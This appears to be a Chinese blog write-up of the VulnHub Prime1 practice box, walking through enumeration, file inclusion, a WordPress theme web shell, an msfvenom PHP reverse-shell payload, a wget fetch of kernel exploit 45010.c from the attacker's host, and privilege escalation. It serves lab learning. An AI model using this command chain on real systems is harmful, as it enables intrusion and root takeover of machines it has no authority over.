渗透测试——prime1靶场实战演练{常用工具}端口转发

文章目录

概要

靶机地址:https://www.vulnhub.com/entry/prime-1,358

信息搜集

nmap

扫网段存活ip及端口

找到除了网关外的ip,开放了80端口,登上去看看

是一个网站,直接上科技扫一扫目录

python 复制代码
 python dirsearch.py -u http://192.168.203.152

扫从出来了常见的wordpress,nice。

那么就使用wpscan...

python 复制代码
wpscan --url http://ip/wordpress/ --e u

扫到一个用户victor,联想到靶机开放了22ssh,那么找到密码就可以尝试进ssh。

没有别的关键信息,换几个扫描工具试试了。。。

python 复制代码
# dirb http://192.168.203.152 -X .zip,.txt,.rar,.php

找到image.php,index.php,sevret.txt

再看看别的工具

python 复制代码
# gobuster dir -u http://192.168.203.152 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.tar,.zip

一样的效果,看来就这些了

再换几个工具试试

python 复制代码
dirsearch -u http://192.168.203.152  -e zip,php,txt,rar,tar -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

这个速度好慢啊,而且结果不是那么明白。

换一个

python 复制代码
feroxbuster -u http://192.168.203.152 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

速度比dirsearch快一点点,结果还是不理想。只扫出来wp。

接下来把搜集到的东西挨个去访问,前两个都是图片,有个secret.txt打开是提示。。

让我们查看location.txt,试试能看吗。

让我们使用fuzz来测试参数,那么就应该想到文件包含了,先试试fuzz

python 复制代码
apt-get install wfuzz 

 wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw=12 "http://192.168.203.152//index.php?FUZZ=aaaa"

隐藏掉所有响应报文字数为 12 的结果后得到了一个 file 参数:

利用file去包含location.txt

让我们在其他php页面使用那个参数,那么很明显就剩一个了。

更换参数发现没啥显示,尝试文件包含试试

直接包含到大动脉了,

仔细找找看看能有啥发现

这个是显示两个用户,一个victor,一个saket,还显示某个地方存在一个passwd文件,

试试文件包含

那么这个应该是victor的密码了,尝试ssh登录

明显没有那么简单就上去,那么就想想这个密码会是什么地方的?

"wordpress"

前面是扫出来了登录页面的

我们去试试看能登陆上吗

先试试victor

发现直接登录了,

找一下有没有可以写入文件的地方

找到了一处有更新按钮的php文件

里面还有人留下过东西,那么应该就是这了

那就上大动作

蚁剑上

这个是路径

python 复制代码
http://192.168.203.152/wordpress/wp-content/themes/twentynineteen/secret.php

似乎有点太顺利了,

果然尝试nc,python等反弹shell方法均无效,那么就

只能想其他办法了

msfvenom 嗯

因为电脑已经开了一个win虚拟机,靶机,再开一个kali直接爆炸了,

于是我

直接用我昨天做的隔空kali
有兴趣去上一个作品

服务器开了,kali去连接就行了,接下来的数据都通过服务器处理

现在才觉得

顺序是多么重要。

刚刚在上面使用命令知道了,这个内核是有漏洞的,所以直接使用

看见有个45010.c

把他下载下来,

python 复制代码
searchsploit -m exploit/linux/local/45010.c

然后上msf

python 复制代码
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.128 lport=4444 -f raw -o shell.php

这个我使用的公网转发,用内网地址代替了,其实是用公网转发到另一套电脑的。

然后就把生成的shell的内容复制到secret.php,并更新他,

接着就是msf组合拳

msfconsole

为啥是127.0.0.1,因为做了转发 ,没明白的看下上一篇。

这样就打进shell了,上面我们还下载了45010.c内核漏洞提权文件

然后我们用python打开一个http服务来让另一台电脑能访问并下载我们的文件。

python 复制代码
python -m http.server 8888

监听一下 ,在msf里面操作下载文件,

python 复制代码
wget http://192.168.199.128/45010.c#desktop
#在哪里打开的就是根目录,直接跟上文件就行 

因为这个是在蚂蚁中完成的,所以图是这样的

不影响接下来的提权

在msf里面试试也是不行,

但是我发现靶机是有python的

所以想到了pty伪终端

利用python的pty模块创建一个伪终端,

python 复制代码
 python -c:‌这是Python命令行工具的一个选项,‌用于执行紧跟在-c后面的Python代码。‌
 import pty;:‌这行代码导入了Python的pty模块,‌该模块提供了一些用于创建和管理伪终端的功能。‌
 pty.spawn('/bin/bash');:‌这行代码使用pty模块的spawn函数来启动一个新的bash shell。‌/bin/bash是bash shell的默认路径,‌spawn函数会创建一个新的进程,‌并在该进程中运行指定的命令(‌在这个例子中是bash shell)‌。‌
          python3 -c "import pty;pty.spawn('/bin/bash');"
然后给编译的450加个执行的权限

发现不能执行,找到了tmp文件夹,发现可以执行,所以直接来试试

ok了查看root文件夹

这就是密钥吧

exit退出后使用sudo -l再看看

发现enc可以以root方法执行

找了一下备份密码

python 复制代码
find / -name '*backup*' 2>dev/nul

然后去执行enc

生成了两个文档

需要解密才行

剩下的交给以后的我,

把基础先学会了。

相关推荐
网络安全(king)几秒前
网络安全攻防学习平台 - 基础关
网络·学习·web安全
Hacker_Nightrain44 分钟前
网络安全与加密
安全·web安全
网安墨雨3 小时前
浅谈TARA在汽车网络安全中的关键角色
网络·web安全·汽车
网安-轩逸3 小时前
汽车网络安全渗透测试
安全·web安全·汽车
黑客Jack4 小时前
什么是网络安全审计?
网络·安全·web安全
hking1115 小时前
upload-labs关卡记录5
web安全·php
网络安全queen5 小时前
【D03】SNMP、NETBIOS和SSH
运维·网络·web安全·ssh
士别三日wyx7 小时前
HW护网分析研判思路,流量告警分析技巧
安全·web安全·网络安全
茶颜悦色vv8 小时前
Wireshark(1)
网络·web安全·网络安全·wireshark
纯净的灰〃9 小时前
vulnhub-matrix-breakout-2-morpheus
安全·web安全·网络安全